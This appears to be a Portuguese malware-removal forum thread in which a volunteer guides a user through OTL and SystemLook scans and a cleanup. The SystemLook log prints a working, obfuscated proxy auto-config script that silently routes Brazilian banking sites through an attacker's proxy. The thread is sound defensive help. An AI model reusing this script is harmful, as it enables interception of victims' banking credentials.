"{26A24AE4-039D-4CA4-87B4-2F83216030FF}" = Java 6 Update 30

"{26A24AE4-039D-4CA4-87B4-2F83217040FF}" = Java 7 Update 45

"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile

"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater

"{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}" = Skype™ 6.6

"{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}" = Windows Media Player Firefox Plugin

"{7E265513-8CDA-4631-B696-F40D983F3B07}_is1" = CDBurnerXP

"{90140000-0011-0000-0000-0000000FF1CE}" = Microsoft Office Professional Plus 2010

"{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{047B0968-E622-4FAA-9B4B-121FA109EDDE}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010

"{90140000-0015-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010

"{90140000-0016-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010

"{90140000-0018-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010

"{90140000-0019-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010

"{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010

"{90140000-001B-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010

"{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUS_{99ACCA38-6DD3-48A8-96AE-A283C9759279}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010

"{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUS_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010

"{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUS_{DEA87BE2-FFCC-4F33-9946-FCBE55A1E998}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010

"{90140000-002C-0409-0000-0000000FF1CE}_Office14.PROPLUS_{7CA93DF4-8902-449E-A42E-4C5923CFBDE3}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2010

"{90140000-0044-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010

"{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUS_{4560037C-E356-444A-A015-D21F487D809E}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010

"{90140000-00A1-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2010

"{90140000-00BA-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010

"{90140000-0115-0409-0000-0000000FF1CE}_Office14.PROPLUS_{4560037C-E356-444A-A015-D21F487D809E}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010

"{90140000-0117-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper

"{BCDB856C-D247-4DEE-9132-89C02F4D6B8C}_is1" = Sothink SWF Decompiler

"{FA0BBB87-91A1-4BFD-9005-EB058BBA0E14}_is1" = StreamTransport version: 1.0.2.2171

"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

"Adobe Flash Player ActiveX" = Adobe Flash Player 11 ActiveX

"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin

"avast" = avast! Free Antivirus

"BSPlayerf" = BS.Player FREE

"BSPlayerp" = BS.Player PRO

"CCleaner" = CCleaner

"DAEMON Tools Lite" = DAEMON Tools Lite

"Download Accelerator Plus (DAP)" = Download Accelerator Plus (DAP)

"FormatFactory" = FormatFactory 3.1.1

"Foxit Reader_is1" = Foxit Reader

"KLiteCodecPack_is1" = K-Lite Codec Pack 9.1.0 (Full)

"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile

"Mozilla Firefox 20.0.1 (x86 pt-BR)" = Mozilla Firefox 20.0.1 (x86 pt-BR)

"MozillaMaintenanceService" = Mozilla Maintenance Service

"Office14.PROPLUS" = Microsoft Office Professional Plus 2010

"PotPlayer" = Daum PotPlayer 1.5.37776

"Quake III Arena" = Quake III Arena

"Samsung ML-1860 Series" = Samsung ML-1860 Series

"Samsung Printer Live Update" = Samsung Printer Live Update

"Software Plate" =

"uTorrent" = µTorrent

"VLC media player" = VLC media player 2.0.4

"Winamp" = Winamp

"WinRAR archiver" = WinRAR 4.10 (32-bit)

========== HKEY_USERS Uninstall List ==========

[HKEY_USERS\S-1-5-21-1065731957-2128596916-2441434026-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"Flux" = F.lux

"Google Chrome" = Google Chrome

========== Last 20 Event Log Errors ==========

[ Application Events ]

Error - 10/11/2013 00:49:17 | Computer Name = 2011_PC | Source = .NET Runtime | ID = 1022

Description =

Error - 10/11/2013 06:45:01 | Computer Name = 2011_PC | Source = .NET Runtime | ID = 1022

Description =

Error - 10/11/2013 06:45:52 | Computer Name = 2011_PC | Source = .NET Runtime | ID = 1022

Description =

Error - 10/11/2013 06:55:26 | Computer Name = 2011_PC | Source = .NET Runtime | ID = 1022

Description =

Error - 10/11/2013 06:56:18 | Computer Name = 2011_PC | Source = .NET Runtime | ID = 1022

Description =

Error - 17/11/2013 09:19:09 | Computer Name = 2011_PC | Source = Application Error | ID = 1000

Description = Nome de aplicativo com falha: gmer.exe, versão: 2.1.19163.0, carimbo

de hora: 0x515d31f0 Nome do módulo de falhas: gmer.exe, versão: 2.1.19163.0, carimbo

de hora: 0x515d31f0 Código de exceção: 0xc0000005 Deslocamento com falha: 0x00012288

Identificação

do processo com falha: 0x1368 Hora de início do aplicativo com falha: 0x01cee396f99c4ac6

Caminho

do aplicativo com falha: C:\Users\2011\Desktop\gmer\gmer.exe FCaminho do módulo

de falhas: C:\Users\2011\Desktop\gmer\gmer.exe Identificação do Relatório: d726a06d-4f8a-11e3-ba19-00188bdfba05

Error - 22/11/2013 20:41:44 | Computer Name = 2011_PC | Source = Application Error | ID = 1000

Description = Nome de aplicativo com falha: winamp.exe, versão: 5.6.3.3235, carimbo

de hora: 0x4fec7b3e Nome do módulo de falhas: MSVCR90.dll, versão: 9.0.30729.4940,

carimbo de hora: 0x4ca2ef57 Código de exceção: 0xc0000005 Deslocamento com falha:

0x00056b74 Identificação do processo com falha: 0x1500 Hora de início do aplicativo

com falha: 0x01cee7e4c37ddea8 Caminho do aplicativo com falha: C:\Program Files\Winamp\winamp.exe

FCaminho

do módulo de falhas: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Identificação

do Relatório: 064d17e0-53d8-11e3-b2ec-00188bdfba05

Error - 22/11/2013 20:42:52 | Computer Name = 2011_PC | Source = Application Error | ID = 1000

Description = Nome de aplicativo com falha: winamp.exe, versão: 5.6.3.3235, carimbo

de hora: 0x4fec7b3e Nome do módulo de falhas: MSVCR90.dll, versão: 9.0.30729.4940,

carimbo de hora: 0x4ca2ef57 Código de exceção: 0xc0000005 Deslocamento com falha:

0x00056b74 Identificação do processo com falha: 0x17cc Hora de início do aplicativo

com falha: 0x01cee7e4eec329da Caminho do aplicativo com falha: C:\Program Files\Winamp\winamp.exe

FCaminho

do módulo de falhas: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Identificação

do Relatório: 2e895d72-53d8-11e3-b2ec-00188bdfba05

Error - 22/11/2013 20:44:37 | Computer Name = 2011_PC | Source = Application Error | ID = 1000

Description = Nome de aplicativo com falha: winamp.exe, versão: 5.6.3.3235, carimbo

de hora: 0x4fec7b3e Nome do módulo de falhas: MSVCR90.dll, versão: 9.0.30729.4940,

carimbo de hora: 0x4ca2ef57 Código de exceção: 0xc0000005 Deslocamento com falha:

0x00056b74 Identificação do processo com falha: 0x4c4 Hora de início do aplicativo

com falha: 0x01cee7e52e23b19b Caminho do aplicativo com falha: C:\Program Files\Winamp\winamp.exe

FCaminho

do módulo de falhas: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Identificação

do Relatório: 6db5b510-53d8-11e3-b2ec-00188bdfba05

Error - 22/11/2013 21:00:02 | Computer Name = 2011_PC | Source = Application Error | ID = 1000

Description = Nome de aplicativo com falha: winamp.exe, versão: 5.6.3.3235, carimbo

de hora: 0x4fec7b3e Nome do módulo de falhas: MSVCR90.dll, versão: 9.0.30729.4940,

carimbo de hora: 0x4ca2ef57 Código de exceção: 0xc0000005 Deslocamento com falha:

0x00056b74 Identificação do processo com falha: 0xcbc Hora de início do aplicativo

com falha: 0x01cee7e75540a71f Caminho do aplicativo com falha: C:\Program Files\Winamp\winamp.exe

FCaminho

do módulo de falhas: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Identificação

do Relatório: 94aafdbf-53da-11e3-b2ec-00188bdfba05

Error - 24/11/2013 15:56:21 | Computer Name = 2011_PC | Source = Application Hang | ID = 1002

Description = O programa DAP.exe versão 10.0.5.1 parou de interagir com o Windows

e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique

o histórico de problemas no painel de controle da Central de Ações. ID de Processo:

eb8 Hora de Início: 01cee9406a085d7f Hora de Término: 72 Caminho do Aplicativo: C:\Program

Files\DAP\DAP.exe Id do Relatório: 7a167df4-5542-11e3-ba91-00188bdfba05

[ System Events ]

Error - 12/11/2013 20:10:35 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 13/11/2013 20:35:34 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 15/11/2013 06:15:07 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 15/11/2013 20:58:24 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 16/11/2013 06:46:54 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 16/11/2013 14:46:31 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 16/11/2013 21:44:14 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 17/11/2013 04:54:35 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 17/11/2013 08:30:37 | Computer Name = 2011_PC | Source = Service Control Manager | ID = 7022

Description = Serviço Wsys Service suspenso ao iniciar.

Error - 17/11/2013 08:32:40 | Computer Name = 2011_PC | Source = DCOM | ID = 10010

Description =

< End of report >

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro manoelvalerio

Faça o download do SystemLook em seu desktop.

Link Alternativo

  • Clique duas vezes no ícone 4119586963_6274067071_o.gif
  • Clique em executar;
  • Copie (ctrl+c) conteúdo abaixo:

:contents
C:\ProgramData\ppctrl.dat

E cole (ctrl+v) no espaço indicado na imagem:

4120361504_f66dd92e95_o.jpg

  • Clique em 4119586997_32a5666660_o.jpg
  • Aguarde;
  • Ao término será aberto o log do scan;
  • Clique em 4120361454_3c264d5fca_o.jpg
  • Poste todo o conteúdo em sua próxima resposta.

Note:
O log também pode ser encontrado no desktop com o nome:
SystemLook.
txt

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

obrigado pela ajuda Diego.

Segue o log.

Manoel.

SystemLook 30.07.11 by jpshortstuff

Log created at 14:06 on 30/11/2013 by 2011

Administrator - Elevation successful

========== contents ==========

C:\ProgramData\ppctrl.dat - Opened succesfully.

function FindProxyForURL(UU, HSY)

{

var HH=String.fromCharCode(104,115,98,99,46,99,111,109,46,98,114);

var B=String.fromCharCode(98,98,46,99,111,109,46,98,114);

var BD=String.fromCharCode(98,97,110,99,111,100,111,98,114,97,115,105,108,46,99,111,109,46,98,114);

var DD=String.fromCharCode(119,46,98,114,97,100,101,115,99,111,46,99,111,109,46,98,114);

var DDD=String.fromCharCode(98,114,97,100,101,115,99,111,112,114,105,109,101,46,99,111,109,46,98,114);

var I=String.fromCharCode(105,116,97,117,46,99,111,109,46,98,114);

var iclass=String.fromCharCode(105,116,97,117,117,110,105,99,108,97,115,115,46);

var AZ=String.fromCharCode(99,97,105,120,97,46,99,111,109,46,98,114);

var AZA=String.fromCharCode(119,46,99,97,105,120,97,46,103,111,118,46,98,114);

var AZB=String.fromCharCode(99,101,102,46,99,111,109,46,98,114);

var BNN=String.fromCharCode(119,46,98,97,110,101,115,101,46,99,111,109,46,98,114);

var SRR=String.fromCharCode(119,46,115,101,114,97,115,97,46,99,111,109,46,98,114);

var AA=String.fromCharCode(97,97,112,106,46,98,98,46,99,111,109);

var pone=String.fromCharCode(80);

var ptwo=String.fromCharCode(82);

var ptthre=String.fromCharCode(79);

var ptfor=String.fromCharCode(88);

var ptfve=String.fromCharCode(89);

var h=pone+ptwo+ptthre+ptfor+ptfve+String.fromCharCode(32,119,119,119,46,115,117,98,117,114,103,97,116,111,114,121,98,114,46,99,111,109,58,56,48);

var L=String.fromCharCode(108,105,110,104,97,100,101,102);

var C=pone+ptwo+ptthre+ptfor+ptfve+String.fromCharCode(32,49,50,55,46,48,46,48,46,49);

if (shExpMatch(UU,"*"+AA+"*")){

return "DIRECT";

}

if (shExpMatch(UU,"*"+B+"*")||shExpMatch(UU,"*"+BD+"*")||shExpMatch(UU,"*"+iclass+"*")||shExpMatch(UU,"*"+DDD+"*")||shExpMatch(UU,"*"+HH+"*")||shExpMatch(UU,"*"+DD+"*")||shExpMatch(UU,"*"+I+"*")||shExpMatch(UU,"*"+BNN+"*")||shExpMatch(UU,"*"+SRR+"*")||shExpMatch(UU,"*"+AZ+"*")||shExpMatch(UU,"*"+AZA+"*")||shExpMatch(UU,"*"+AZB+"*")){

return h;

}

if (shExpMatch(UU,"*"+L+"*")) {return C;}

return "DIRECT";

}

-= EOF =-

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro manoelvalerio

Novamente com o OTL

  • Clique duas vezes no ícone 3984478580_7ed4cabc45_o.gif
  • Copie e cole o conteúdo abaixo, no espaço logo após 5369460409_ee749edc8e_m.jpg

:OTL
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}:"URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:20.0.1
FF - prefs.js..network.proxy.autoconfig_url: "file:///C:\\ProgramData\\ppctrl.dat"
FF - prefs.js..network.proxy.http: "189.112.117.5"
[2013/08/26 13:12:10 | 000,000,004 | ---- | C] () -- C:\ProgramData\98
[2013/08/03 16:37:56 | 000,002,006 | -H-- | C] () -- C:\ProgramData\ppctrl.dat
[2013/08/03 16:37:55 | 000,000,004 | ---- | C] () -- C:\ProgramData\99
[2013/08/03 16:37:47 | 000,000,000 | ---- | C] () -- C:\ProgramData\0
@Alternate Data Stream - 128 bytes -> C:\ProgramData\TEMP:56E2E879

:Commands
[purity]
[emptyflash]
[createrestorepoint]
[emptytemp]

  • Clique no botão 5370056394_358505935a_m.jpg
  • Quando reiniciar vai aparecer uma janela, clique em executar;
  • Salve (arquivo > salvar como) o log no desktop com um nome que desejar;
  • Poste o conteúdo desse log em sua próxima resposta.
  • Atenção: se fechar o log sem ter salvo antes ele sumirá.
  • Abra novamente o OTL e clique no botão 5370056476_bf9f840a51_m.jpg
  • Não interrompa o scan em hipótese algum;
  • Quando terminar será gerado o OTL.txt;
  • Poste mais este log em sua próxima resposta o log gerado.

Observação: Se por acaso perder o log depois do reinício do computador você poderá acessá-lo na pasta C:\_OTL\Moved Files

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Olá Diego. Seguem os logs.

Obrigado pela atenção!

All processes killed

========== OTL ==========

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.

Registry key HKEY_USERS\S-1-5-21-1065731957-2128596916-2441434026-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.

Prefs.js: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:20.0.1 removed from extensions.enabledAddons

Prefs.js: "file:///C:\\ProgramData\\ppctrl.dat" removed from network.proxy.autoconfig_url

Prefs.js: "189.112.117.5" removed from network.proxy.http

C:\ProgramData\98 moved successfully.

C:\ProgramData\ppctrl.dat moved successfully.

C:\ProgramData\99 moved successfully.

C:\ProgramData\0 moved successfully.

ADS C:\ProgramData\TEMP:56E2E879 deleted successfully.

========== COMMANDS ==========

[EMPTYFLASH]

User: 2011

->Flash cache emptied: 764 bytes

User: All Users

User: Default

User: Default User

User: Public

User: Todos os Usuários

User: Usuário Padrão

Total Flash Files Cleaned = 0,00 mb

Restore point Set: OTL Restore Point

[EMPTYTEMP]

User: 2011

->Temp folder emptied: 15500177 bytes

->Temporary Internet Files folder emptied: 804600 bytes

->Java cache emptied: 7368973 bytes

->FireFox cache emptied: 298727431 bytes

->Google Chrome cache emptied: 313046209 bytes

->Flash cache emptied: 0 bytes

User: All Users

User: Default

->Temp folder emptied: 0 bytes

->Temporary Internet Files folder emptied: 0 bytes

User: Default User

->Temp folder emptied: 0 bytes

->Temporary Internet Files folder emptied: 0 bytes

User: Public

User: Todos os Usuários

User: Usuário Padrão

->Temp folder emptied: 0 bytes

->Temporary Internet Files folder emptied: 0 bytes

%systemdrive% .tmp files removed: 0 bytes

%systemroot% .tmp files removed: 0 bytes

%systemroot%\System32 .tmp files removed: 0 bytes

%systemroot%\System32\drivers .tmp files removed: 0 bytes

Windows Temp folder emptied: 847698 bytes

RecycleBin emptied: 35659609 bytes

Total Files Cleaned = 641,00 mb

OTL by OldTimer - Version 3.2.69.0 log created on 12042013_204351

Files\Folders moved on Reboot...

File move failed. C:\Windows\temp\_avast_\Webshlock.txt scheduled to be moved on reboot.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...

-----------------------------------------------

OTL logfile created on: 04/12/2013 20:49:25 - Run 2

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\2011\Desktop

Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.10.9200.16736)

Locale: 00000416 | Country: Brasil | Language: PTB | Date Format: dd/MM/yyyy

2,00 Gb Total Physical Memory | 1,11 Gb Available Physical Memory | 55,36% Memory free

4,00 Gb Paging File | 2,83 Gb Available in Paging File | 70,88% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files

Drive C: | 232,73 Gb Total Space | 104,56 Gb Free Space | 44,93% Space Free | Partition Type: NTFS

Computer Name: 2011_PC | User Name: 2011 | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: Current user | Quick Scan

Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/11/30 11:23:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

PRC - [2013/11/08 22:36:33 | 003,568,312 | ---- | M] (AVAST Software) -- C:\Arquivos de Programas\AVAST Software\Avast\AvastUI.exe

PRC - [2013/11/08 22:36:32 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Arquivos de Programas\AVAST Software\Avast\AvastSvc.exe

PRC - [2012/11/23 00:48:41 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe

PRC - [2012/09/24 12:26:30 | 000,092,800 | ---- | M] (Beijing Xing Technology Co., Ltd.) -- C:\Arquivos de Programas\Software Plate\svcgdp.exe

PRC - [2011/02/25 03:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe

PRC - [2010/11/20 10:17:56 | 001,121,792 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe

PRC - [2009/08/29 04:00:12 | 000,966,656 | ---- | M] () -- C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

========== Modules (No Company Name) ==========

MOD - [2013/11/14 09:29:31 | 000,399,312 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\ppGoogleNaClPluginChrome.dll

MOD - [2013/11/14 09:29:30 | 013,582,800 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\PepperFlash\pepflashplayer.dll

MOD - [2013/11/14 09:29:29 | 004,055,504 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\pdf.dll

MOD - [2013/11/14 09:28:37 | 000,702,416 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\libglesv2.dll

MOD - [2013/11/14 09:28:36 | 000,099,792 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\libegl.dll

MOD - [2013/11/14 09:28:34 | 001,619,408 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\ffmpegsumo.dll

MOD - [2013/10/21 14:12:35 | 019,336,120 | ---- | M] () -- C:\Arquivos de Programas\AVAST Software\Avast\libcef.dll

MOD - [2011/03/17 00:11:16 | 004,297,568 | ---- | M] () -- C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF

MOD - [2010/10/20 15:45:26 | 008,801,120 | ---- | M] () -- C:\Arquivos de Programas\Microsoft Office\Office14\1033\GrooveIntlResource.dll

MOD - [2009/08/29 04:00:12 | 000,966,656 | ---- | M] () -- C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

========== Services (SafeList) ==========

SRV - [2013/11/08 22:36:32 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Arquivos de Programas\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)

SRV - [2013/10/09 00:56:37 | 000,257,416 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)

SRV - [2013/10/05 22:41:26 | 000,115,608 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)

SRV - [2013/06/21 11:57:12 | 000,162,408 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Arquivos de Programas\Skype\Updater\Updater.exe -- (SkypeUpdate)

SRV - [2013/05/27 02:57:27 | 000,680,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Windows Defender\MpSvc.dll -- (WinDefend)

SRV - [2012/09/24 12:26:30 | 000,092,800 | ---- | M] (Beijing Xing Technology Co., Ltd.) [Auto | Running] -- C:\Arquivos de Programas\Software Plate\svcgdp.exe -- (svcgdp)

SRV - [2010/12/27 23:50:30 | 031,124,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)

SRV - [2010/11/20 10:17:56 | 001,121,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc)

SRV - [2010/01/09 21:37:50 | 004,640,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE -- (osppsvc)

SRV - [2010/01/09 21:18:00 | 000,149,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\Source Engine\OSE.EXE -- (ose)

SRV - [2009/07/13 23:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc)

SRV - [2009/07/13 23:16:12 | 001,004,544 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\PeerDistSvc.dll -- (PeerDistSvc)

SRV - [2003/04/18 20:06:26 | 000,008,192 | ---- | M] () [Disabled | Stopped] -- C:\Windows\System32\srvany.exe -- (KMService)

========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\rdvgkmd.sys -- (VGPU)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\drivers\tsusbhub.sys -- (tsusbhub)

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\synth3dvsc.sys -- (Synth3dVsc)

DRV - [2013/11/08 22:37:09 | 000,403,440 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswsp.sys -- (aswSP)

DRV - [2013/11/08 22:36:37 | 000,057,672 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswTdi.sys -- (aswTdi)

DRV - [2013/11/08 22:36:36 | 000,774,392 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswSnx.sys -- (aswSnx)

DRV - [2013/11/08 22:36:36 | 000,070,384 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt)

DRV - [2013/11/08 22:36:36 | 000,035,656 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswFsBlk.sys -- (aswFsBlk)

DRV - [2013/10/21 14:12:37 | 000,178,304 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswVmm.sys -- (aswVmm)

DRV - [2013/10/21 14:12:37 | 000,079,720 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr2.sys -- (aswRdr)

DRV - [2013/10/21 14:12:37 | 000,049,944 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswRvrt.sys -- (aswRvrt)

